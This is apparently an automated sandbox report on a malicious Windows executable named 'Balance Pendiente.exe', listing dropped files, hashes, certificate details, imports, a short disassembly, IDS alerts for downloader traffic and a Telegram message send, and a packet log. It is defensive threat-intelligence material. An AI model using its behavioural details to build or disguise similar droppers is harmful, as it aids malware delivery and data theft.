C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe 

Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 507280 |
Entropy (8bit): | 7.58580269013346 |
Encrypted: | false |
SSDEEP: | 12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p |
MD5: | E70E71A31781B44F850A39693784CE74 |
SHA1: | CE8CF2DC1B30D5D6870CC3D374C15E1005FDC879 |
SHA-256: | A02B56B4C74424B72AE21D4737E822653E68B9762E1AEB313D81BD45ABCE39E7 |
SHA-512: | 2A7994CEC6638F7FF523358E7DF0BFDDAD0F2ABAEF89E598455E9F0B7A44009E139AC9F9AFD7AC38377ED302727C5C75322327B8FABF0B450835CDBB5C52A9A8 |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe:Zone.Identifier 
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Brnaba.txt
Download File
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 357 |
Entropy (8bit): | 4.322293998459369 |
Encrypted: | false |
SSDEEP: | 6:PLZOEA1KHK56RTYPCl0ic0BTgcNDuARfKQfOwVBbvmF00aLdT4F+6/EB+OHeWhkb:P8HnPel/PMARfKnwVBbvmAhT4F+6TIkb |
MD5: | ACED15FD55D311D663ECC7B5F386B8E2 |
SHA1: | A7F36FD33206209CB0E5E39643EC8C6773D5ED3B |
SHA-256: | 16FDDF0D82AA1263194FE7C92459A6CF21DDDB1F1AE5A4E5A099865DB126614F |
SHA-512: | 7F27A00EDA246719E5F8FA521AC9499002DFDB36F6E661E13797C863520D84D14F43B5F717B176BBBEFCB4B62B671A14292C59DF288C55628CA08868BBCCFBD3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122
Download File
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60368 |
Entropy (8bit): | 5.280991252251336 |
Encrypted: | false |
SSDEEP: | 1536:IuWZnBGyJTf6U1uxBx174Nsp/0PjUt5hYlH:ULvTf/1uHNcj6XYt |
MD5: | 798E71F2FB7AECCBF532D4B9C7484B56 |
SHA1: | D22784524AC6412395F51A3FD3FE0CFBA04F034C |
SHA-256: | 1669D04C0289873AA79409AC3522A90CE116740F52C11EB8833AAF5C8908ACB8 |
SHA-512: | 29F868A51AC1B4C25A4A7D1FAD093E6FCCC3ADC762F8FA791C8E728AAF16A26CE0E43CDF45F955D0152D94CCFF514776426BFB9A088CEBF77EF9521A642606BF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Unloveliest183.jpg
Download File
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7357 |
Entropy (8bit): | 7.91945978739656 |
Encrypted: | false |
SSDEEP: | 192:LqBD2cMKYD6M3QJxtEns0OU16nK3HXJ2UgU:eBDnM6MgDtEEUknqYUL |
MD5: | F32B2F6007A74312B5F0CB1AA5B26680 |
SHA1: | BC3DC7EB50EFA53CE2FC46A32C5F995048BD85B3 |
SHA-256: | 2CB79365771956854ACEAD63102B019737F5C99A5A10DA94D2969638CC23E825 |
SHA-512: | EBE3120E79D07F3D1D775940ADF00E099AFD6F3273D49C2D600FEE1ACE2C175C9E01CBE9EB3D83EF7D033F129C5D562983F19B1D7CD327763A92E9A246EB94F3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Yderredens102.Kan
Download File
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338276 |
Entropy (8bit): | 7.671083634160716 |
Encrypted: | false |
SSDEEP: | 6144:WWxwim+hZhU4Cb/9U5usu4LX4Ev0P+sDBG6IzhV8ulhplMjNzxU9l:WWxrPhxY9su+IBGsDI9qEQxUH |
MD5: | A4DD91D5ACFA3D8154510A16A27792DF |
SHA1: | 7F797BEECC8609A7B617A7CCD6BA8A335D475A47 |
SHA-256: | 5AE90EE62220502C1041B177854398C94B9F42F6115CE6FCA120B7C0702C0286 |
SHA-512: | 8F119081CF9625F036AC4783A7D127D25E8BF82BC6FEBE804EDAC2D18B71B9E85AB2C26CB04AA1A28A47CC1D49BD0676D486FEA917CA872B7C2E43A6AF889C07 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\blinkenberg.txt
Download File
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 188 |
Entropy (8bit): | 4.482002609682535 |
Encrypted: | false |
SSDEEP: | 3:jNgLDK9OujIcBAVar8kQWgQQXTzMTBWAQ2qQJCTgLck/xLCmSoTKA9jsqdn:WEOnwfoOVm0tnNwTOdg295dn |
MD5: | 2B51E420AA9188A74DB9D853C1225B5C |
SHA1: | B1AA913BBE9C576F1C7917AE2E18F4F5C4B54164 |
SHA-256: | FA760065782306B4B9E082086166D25EADA402A3332C771C48F4EDE9D5DC7E53 |
SHA-512: | 574581B87211289CC809F0BF97E968E5BC070C95B20E92ADC4315404A3E632754291BBE3B3AF1894441855BD25C797FF52ADF968DC0A73F710F199017CAF37E6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\fllesbrn.txt
Download File
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 279 |
Entropy (8bit): | 4.994626166298632 |
Encrypted: | false |
SSDEEP: | 6:2/r0IwOQPFeBmRaaBO/XJLgDj/GZowKblJBQVAL6Ab9xu+b1:2A9OQYYJO/XuGZjKJJiVu6AbT5R |
MD5: | 6620E9C5C35F1FEAAFC525A49FF31080 |
SHA1: | 969AB64F04BCDCAB9088F1F2FA6A8209DB33E8FD |
SHA-256: | FCD285BFF12244DA3CF356243BEACEB8DB8B2868320D371D1059408AD02A0CAA |
SHA-512: | A3238FD4843C3407CD07C014444F2557D7064F53A074F58BE97230A7CC7D81E0C7D09DD25B9110C5568466E2F9AA10EB11129ED143E07F63763EB5FE3DA75ED9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\sensible.jpg
Download File
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 32639 |
Entropy (8bit): | 7.9475019669336495 |
Encrypted: | false |
SSDEEP: | 768:6+UnjpGM4h/Q0kf7jWCXOi/vWYjc/Gv33xxMatfqxi/fftvoEP:6+UjpB4K0kjjWKOi/vWYjOUHXtfqAXvP |
MD5: | 86647E5BC7C82F155C5CB0EC05F40E9F |
SHA1: | E0946F26733AA05FCEAE067377622C083AF88C8D |
SHA-256: | 6D1974E15C49647F2BA907D7D233CB04D2F9D9C77CFB6B4255B577FE95D54B19 |
SHA-512: | 7C812D119382C9135195DDD18106FC6B465982D36C7815680C52DE2C0A40DC8E569FFBF32E87AF8BA10A71670A01CAB30D0D36CE49DB599473EC10CDACEFF992 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.58580269013346 |
TrID: |
|
File name: | Balance Pendiente.exe |
File size: | 507'280 bytes |
MD5: | e70e71a31781b44f850a39693784ce74 |
SHA1: | ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879 |
SHA256: | a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7 |
SHA512: | 2a7994cec6638f7ff523358e7df0bfddad0f2abaef89e598455e9f0b7a44009e139ac9f9afd7ac38377ed302727c5c75322327b8fabf0b450835cdbb5c52a9a8 |
SSDEEP: | 12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p |
TLSH: | 33B4F1A37286E5E7F4560CF4CC299AF993A2ED01D9D85503F184BF2F387366245250AF |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@ |
Icon Hash: | 371f9d96cb0d1703 |
Entrypoint: | 0x4030b8 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x52BA66A9 [Wed Dec 25 05:01:29 2013 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e160ef8e55bb9d162da4e266afd9eef3 |
Signature Valid: | false |
Signature Issuer: | CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 92807D7374421D79A823FA7ACA6FF4C6 |
Thumbprint SHA-1: | 05F5583BAAEA1B3C4E6C4B87EF108D1468F3E327 |
Thumbprint SHA-256: | E8C65A4CB80B655AEF4C0D07A3D407B6265C0EC80F62EE79AC5291A245D3AEA2 |
Serial: | 391A08F4CFA8FACE743EC806DF49200A45DD1E7D |
Instruction |
---|
sub esp, 00000184h |
push ebx |
push ebp |
push esi |
xor ebx, ebx |
push edi |
mov dword ptr [esp+18h], ebx |
mov dword ptr [esp+10h], 00409190h |
mov dword ptr [esp+20h], ebx |
mov byte ptr [esp+14h], 00000020h |
call dword ptr [00407034h] |
push 00008001h |
call dword ptr [0040711Ch] |
push ebx |
call dword ptr [0040728Ch] |
push 00000008h |
mov dword ptr [00423778h], eax |
call 00007F773490ADCAh |
mov dword ptr [004236C4h], eax |
push ebx |
lea eax, dword ptr [esp+38h] |
push 00000160h |
push eax |
push ebx |
push 0041EC80h |
call dword ptr [00407164h] |
push 00409180h |
push 00422EC0h |
call 00007F773490AA74h |
call dword ptr [00407120h] |
mov ebp, 00429000h |
push eax |
push ebp |
call 00007F773490AA62h |
push ebx |
call dword ptr [00407118h] |
cmp byte ptr [00429000h], 00000022h |
mov dword ptr [004236C0h], eax |
mov eax, ebp |
jne 00007F773490803Ch |
mov byte ptr [esp+14h], 00000022h |
mov eax, 00429001h |
push dword ptr [esp+14h] |
push eax |
call 00007F773490A4F2h |
push eax |
call dword ptr [00407220h] |
mov dword ptr [esp+1Ch], eax |
jmp 00007F77349080F5h |
cmp cl, 00000020h |
jne 00007F7734908038h |
inc eax |
cmp byte ptr [eax], 00000020h |
je 00007F773490802Ch |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0x18a50 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x7b610 | 0x780 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5a6a | 0x5c00 | 8781c451557a4626018483faabe438d0 | False | 0.6614724864130435 | data | 6.417713695663469 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x11ce | 0x1200 | 640f709ec19b4ed0455a4c64e5934d5e | False | 0.4520399305555556 | OpenPGP Secret Key | 5.23558258677739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x1a7b8 | 0x400 | c9a433d4fe67308d6a5942cfb667cbe7 | False | 0.5986328125 | data | 4.862130355383113 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x24000 | 0x12000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x36000 | 0x18a50 | 0x18c00 | ae1da6d52c6b9db5a72bcee2295c6945 | False | 0.3393604008838384 | data | 4.6330392279203245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x36448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.2523660238968414 |
RT_ICON | 0x46c70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4220954356846473 |
RT_ICON | 0x49218 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.49343339587242024 |
RT_ICON | 0x4a2c0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5876865671641791 |
RT_ICON | 0x4b168 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5450819672131147 |
RT_ICON | 0x4baf0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.7319494584837545 |
RT_ICON | 0x4c398 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.7811059907834101 |
RT_ICON | 0x4ca60 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.47804878048780486 |
RT_ICON | 0x4d0c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.7095375722543352 |
RT_ICON | 0x4d630 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6879432624113475 |
RT_ICON | 0x4da98 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.5551075268817204 |
RT_ICON | 0x4dd80 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States | 0.6086065573770492 |
RT_ICON | 0x4df68 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.6993243243243243 |
RT_DIALOG | 0x4e090 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x4e190 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x4e2b0 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x4e378 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x4e3d8 | 0xbc | data | English | United States | 0.601063829787234 |
RT_VERSION | 0x4e498 | 0x2b0 | data | English | United States | 0.5058139534883721 |
RT_MANIFEST | 0x4e748 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984 |
DLL | Import |
---|---|
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary |
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |
Description | Data |
---|---|
Comments | forskningslederen phon |
CompanyName | influenzaepidemiens doktoren |
FileVersion | 2.4.0.0 |
InternalName | nadvergst.exe |
LegalCopyright | bimahs weensier spildevandsledningernes |
LegalTrademarks | intensiveringernes |
Translation | 0x0409 0x04e4 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-02-25T08:27:35.888216+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | TCP |
2025-02-25T08:27:41.175108+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:42.581340+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:43.138773+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:43.800116+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | TCP |
2025-02-25T08:27:45.588203+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:46.775686+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | TCP |
2025-02-25T08:27:53.628181+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 25, 2025 08:27:34.700143099 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:34.700206995 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:34.704026937 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:34.791857958 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:34.791884899 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.462557077 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.462738037 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.463373899 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.463435888 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.511449099 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.511483908 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.511815071 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.511872053 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.515499115 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.559334040 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.888216019 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.888287067 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.888299942 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.888336897 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.888556004 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.888587952 CET | 443 | 49770 | 172.217.18.14 | 192.168.2.4 |
Feb 25, 2025 08:27:35.888632059 CET | 49770 | 443 | 192.168.2.4 | 172.217.18.14 |
Feb 25, 2025 08:27:35.932171106 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:35.932220936 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:35.932405949 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:35.932883978 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:35.932897091 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:36.594932079 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:36.595026016 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:36.599673033 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:36.599705935 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:36.599997044 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:36.600052118 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:36.607388020 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:36.651338100 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.311794043 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.311968088 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.312279940 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.312340975 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.326678038 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.326780081 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.326793909 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.326833010 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.400381088 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.400496960 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.400513887 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.400568962 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.400624037 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.400679111 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.400758028 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.400827885 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.400840044 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.400930882 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.406708002 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.406764984 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.406778097 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.406862020 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.413311958 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.413439035 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.413450956 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.413589954 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.419622898 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.419719934 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.419738054 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.419776917 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.425885916 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.426039934 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
